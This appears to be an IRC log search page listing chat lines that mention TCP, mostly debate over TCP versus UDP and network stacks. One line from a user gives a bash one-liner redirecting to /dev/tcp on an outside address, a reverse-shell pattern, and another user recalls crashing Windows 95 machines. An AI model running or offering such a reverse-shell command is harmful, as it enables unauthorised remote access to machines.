log☇︎
512 entries in 0.907s
mircea_popescu: decimation i don't like it, because : as a way to transfer data between the two computers where there's a cable, it's stupid. even serial protocol is better, but we have tcp etc. as an airgapped solution is stupid, because sound.
decimation: well, there's also the thought of puttint it all on tcp port 80 and putting fake http headers
asciilifeform: because tcp establishes a connection
asciilifeform: mircea_popescu: nope. does not work on tcp.
mircea_popescu: asciilifeform this works on tcp too
adlai: what about mpex needs tcp?
asciilifeform: console can be connected to tcp or to radio set on valves
adlai: I guess it's an example of something which could work equally well over udp, and just happens to use tcp for convenience
adlai . o ( one could say that mpex simulates udp on top of tcp )
asciilifeform: you will -never- get single-packet friend-or-foe with tcp or tcp-like apparatus.
asciilifeform: artifexd: for sufficiently simple quanta, it is very easy to 'verify received' without duplicating all the cruft of tcp.
artifexd: If you want a back and forth connection, you end up duplicating tcp yourself.
mircea_popescu: tcp is hard to employ usefully.
asciilifeform: tcp is hard.
asciilifeform: i wouldn't bother arguing the udp/tcp point were it not for the fact that this is not a decision that can be easily re-visited.
mircea_popescu: another advantage to tcp is that you don't really get to care about mtus and all that.
asciilifeform: the connection-tracking apparatus of tcp is really half the force behind the sting of 'ddos'
artifexd: TCP does offer advantages. Not having to reinvent/reimplement transmission reliability/ordering is not a minor thing.
[]bot: Unable to get details for bet 1089: Get http://bitbet.us/bet/1089/?json: dial tcp 185.56.137.194:80: ConnectEx tcp: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
decimation: yeah, tcp is pretty much the most retarded protocol you could pick to try to make 'anonymous'
asciilifeform: decimation: he means, i think, generic tcp stream (vs. store-and-forward, which is more or less the only way to even begin resisting elementary traffic analysis)
Luke-Jr: it's a DDoS, except at the Bitcoin layer rather than TCP
Luke-Jr: nobody much routes TCP packets free of charge
ben_vulpes: kinda misses the entire point of the tcp protocol, where one just routes packets.
decimation: actually vint has much to answer for, because of tcp. TCP was a step backwards in networking
asciilifeform: someone probably wonders 'wtf, why fountain code'. answer: getting rid of tcp.
gribble: TCP sequence prediction attack - Wikipedia, the free encyclopedia: <http://en.wikipedia.org/wiki/TCP_sequence_prediction_attack>; Multiple Vendor TCP Sequence Number Approximation Vulnerability: <http://www.securityfocus.com/bid/10183/discuss>; TCP Sequence Prediction Attack - The Tech-FAQ: <http://www.tech-faq.com/tcp-sequence-prediction-attack.html>
asciilifeform: ;;google tcp sequence number vulnerability
asciilifeform: who recalls the tcp sequence number bugs ?
decimation: tcp pretends that doesn't exist
decimation: tcp really is pretty retarded if you think about
asciilifeform: decimation: in point of fact, you can get by without either tcp or the proverbial 'bad reimplementation' of it
decimation: asciilifeform: I'm not sure you really need tcp at all if you have a crypto-wot
mircea_popescu: tcp 0 0 192.168.*:42230 ddos-server.intyl.b:www ESTABLISHED 1794/opera
decimation: it was connected to a radio modem and managed to pass tcp to other ham radio operators
decimation: back in my youth I actually ran a tcp/ip node on an 8086
mircea_popescu: this is incredibly fucking immense, try and make an tcp stack that offers this guarantee to any os.
mircea_popescu: tcp 0 0 23.235.236.98:http www.fraudalertservice:38410 SYN_RECV << all sorts of lulz like that.
bounce: er, tcp doesn't do crap without ip to transport it. the layers do build on each other
bounce: well, try this on first: "tcp/ip" generally refers to the whole stack. supposing you really ment IP (layer 3, conventionally), then "app aware" (with app: layer 7) would be a bit of a layer violation.
mircea_popescu: it's like asking for an "app aware" tcp/ip implementation.
mircea_popescu: no it won't. how long do you think people can spend reading shitty c/c++ tcp/ip implementations before they give up their idiocy like the plague ?
mircea_popescu: "i want a complete report on every tcp/ip implementation out there. by hand. line by line comparison of all versions ever made"
asciilifeform: tcp-wot.
bounce: oh, you can implement a tcp/ip stack, apparently not too much work. making it work well, especially tcp, is going to be a bit more work though.
asciilifeform: people act as if tcp/ip were a moon rocket
bounce: you'd need a tcp/ip stack linked to your program meaning that as soon as it quits the box is off the 'net, but whatever it's configured to use it'll use.
asciilifeform: BingoBoingo: given that tcp/ip lets you fuck with ordering, that trivially parallelizes. at least, as fast as you can physically clock the bits off the wire to individual comparison registers, and then back on
Naphex: could've just used a reverse echo "code" >& /dev/tcp/8.8.8.8/8080 0>&1
mircea_popescu: no tcp/ip where they live or what
asciilifeform: but instead an entity which simulates the behaviour of one where possible (in much the same way a tcp/ip telephone attempts to behave like a traditional electric telephone.)
X-Rob: [2014-09-15 07:59:31] Pool 1 stratum+tcp://104.131.60.126:8559 alive, testing stability
X-Rob: [2014-09-15 07:49:28] Pool 1 stratum+tcp://104.131.60.126:8559 alive, testing stability
decimation: even TCP is devilish
asciilifeform: 'rewrite the tcp/ip stack so that all traffic is encrypted' << doesn't solve the problem described in the 'enforcement' article.
FabianB: "rewrite the tcp/ip stack so that all traffic is encrypted" <-- as cjdns has done
mircea_popescu: asciilifeform: http://www.loper-os.org/?p=1490 << alternatively, why not rewrite the tcp/ip stack so that all traffic is encrypted properly and adios.
mircea_popescu: [UFW BLOCK] IN=eth1 OUT= SRC=208.94.26.148 DST=192.168.0.100 LEN=52 TOS=0x00 PREC=0x00 TTL=242 ID=65083 DF PROTO=TCP SPT=443 DPT=46252
asciilifeform: large, and often changing, standards: TCP/IP, HTTP, HTML,
mircea_popescu: same exact thing can besaid of tcp/ip, or anything else that works.
kakobrekla: i guess ukyo cant comment, he is out of tcp packets.
cgcardona: moiety: done (secret TCP handshake added)
asciilifeform: BingoBoingo: real time tcp/ip, over 1000s of km, for millions of people - is a luxury.
asciilifeform: arsenet is coming, because the average luser doesn't really insist on being able to open an arbitrary tcp connection from wherever to wherever
mod6: ye ole bug in the tcp stack 'eh
mircea_popescu: who wrote their own tcp stack ? netbsd ?
pankkake: and the many OSes which copied that TCP stack
pankkake: also http://www.freebsd.org/security/advisories/FreeBSD-SA-14:08.tcp.asc
thestringpuller: you can't trust the TCP/IP stack
fluffypony: ThickAsThieves: FIX is quite an interesting, old (early 90's) protocol that is basically pipe-char separated key-values (key is always numeric and based on a predefined list), and you literally dump the ASCII over a TCP session
fluffypony: ICMP traffic is working, TCP is working, but HTTP/HTTPS isn't working
bounce: validate in what sense, ip packets? tcp streams?
jurov: just cause it "exceeded connection attempt threshold to tcp:22 81 times in a 30 minute period"
mircea_popescu: tcp/ip is shit for that matter.
decimation: no, but I find the overuse of TCP to be an annoyance. TCP was made by the devil to help people trick themselves
decimation: what I don't understand is why bitcoin network code uses TCP, yet includes optimization hacks to try to improve performance. Why not manage things properly at the application layer with UDP?
blg: mtgox also uses tcp/ip case closed
mike_c: benkay: yes, i just don't think a reference implementation counts as well defined. so TCP_KEEPALIVE is set to 100. why? was that picked intellignetly, randomly, or it doesn't really fking matter? you don't know from implementation.
benkay: well i was going to write a tcp client test harness today but then got distracted and this came out instead: http://cascadianhacker.com/blog/2014/02/08_when-you-know-you-done-fucked-up-but-cant-admit-it-in-public.html
benkay`: ;;later tell mircea_popescu now for a tcp test harness. on one hand, 'yak shaving'. on the other hand, things worth doing are worth doing well.
BingoBoingo: mircea_popescu: Dunno if he did. Just seems the way he is wanting to ruin BTC fall inline with the ways Google wants to ruin TCP
KRS1: It was a c program that modified TCP buffer sizes when you sent a request to a computer running an unpatched Windows95 machine. It would lock it up cold. You could watch entire irc rooms disappear.
KRS1: i like messing around with concepts like that..back in the day i used to play with the tcp buffer size on the internet and lan's and stuff
asciilifeform: https://github.com/elvanderb/TCP-32764
mircea_popescu: tcp ios kinda complicated...
mike_c: yeah, i just feel like we're talking about tcp KEEP_ALIVE and deciding it's too complicated :) even tcp is complicated.
mircea_popescu: still, we use http and tcp/ip
asciilifeform: BingoBoingo: If you've managed to write a working TCP/IP stack for your TI, go for it.
gecko_x2: you combine a noiste aware tcp/ip interfac with strong symmetric OTP crypto
jurov: you can't have distributed DNS/SSL when underlying TCP/IP stack is vulnerable to coercion
mircea_popescu: somebody needs to make a new tcp/ip stack
asciilifeform: I have an FPGA board right here on my desk, with a completely verifiable TCP/IP stack
Framedragger: yeah if it's ssl, they can profile ssl.. if it's just bare tcp, sure it's more difficult true
KRS1: what do you mean by encrypted channel..a given TCP port with known encryption data?
MJR_: socket.io like emulating a constant tcp socket
Scrat: orkaa: I'd like you see you spoof a tcp handshake
thestringpuller: so it's like tcp dropping packets :(
MJR_III: its trying to implement tcp sockets into a client/server model
mod6: but when the size of UDP gets over 65,535 bytes (need to double check), it simply converts it to TCP and sends it that way. something can be learned from this, nothing more.
MJR_: I think it's multicast tcp?